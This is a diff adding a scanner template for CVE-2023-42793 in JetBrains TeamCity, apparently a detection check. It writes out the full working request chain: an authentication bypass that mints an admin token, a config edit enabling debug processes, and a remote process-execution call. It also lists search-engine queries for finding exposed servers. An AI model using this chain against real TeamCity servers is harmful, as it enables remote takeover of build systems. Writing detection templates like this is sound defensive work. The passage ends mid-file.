diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml
new file mode 100644
index 00000000000..fb9b0fc02b6
--- /dev/null
+++ b/http/cves/2023/CVE-2023-42793.yaml
@@ -0,0 +1,78 @@
+id: CVE-2023-42793
+
+info:
+ name: JetBrains TeamCity < 2023.05.4 - Remote Code Execution
+ author: iamnoooob,rootxharsh,pdresearch
+ severity: critical
+ description: |
+ In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
+ reference:
+ - https://www.jetbrains.com/privacy-security/issues-fixed/
+ - https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis
+ - https://www.sonarsource.com/blog/teamcity-vulnerability
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-42793
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-42793
+ cwe-id: CWE-288
+ epss-score: 0.00091
+ epss-percentile: 0.38288
+ cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 5
+ verified: true
+ shodan-query: title:TeamCity
+ fofa-query: title=TeamCity
+ vendor: jetbrains
+ product: teamcity
+ tags: cve,cve2023,jetbrains,teamcity,rce,auth-bypass,intrusive
+
+http:
+ - raw:
+ - |
+ DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ - |
+ POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Bearer {{token}}
+ Content-Type: application/x-www-form-urlencoded
+
+ - |
+ POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Bearer {{token}}
+ Content-Type: application/x-www-form-urlencoded
+
+ - |
+ POST /app/rest/debug/processes?exePath=echo¶ms={{randstr}} HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Bearer {{token}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_2
+ words:
+ - '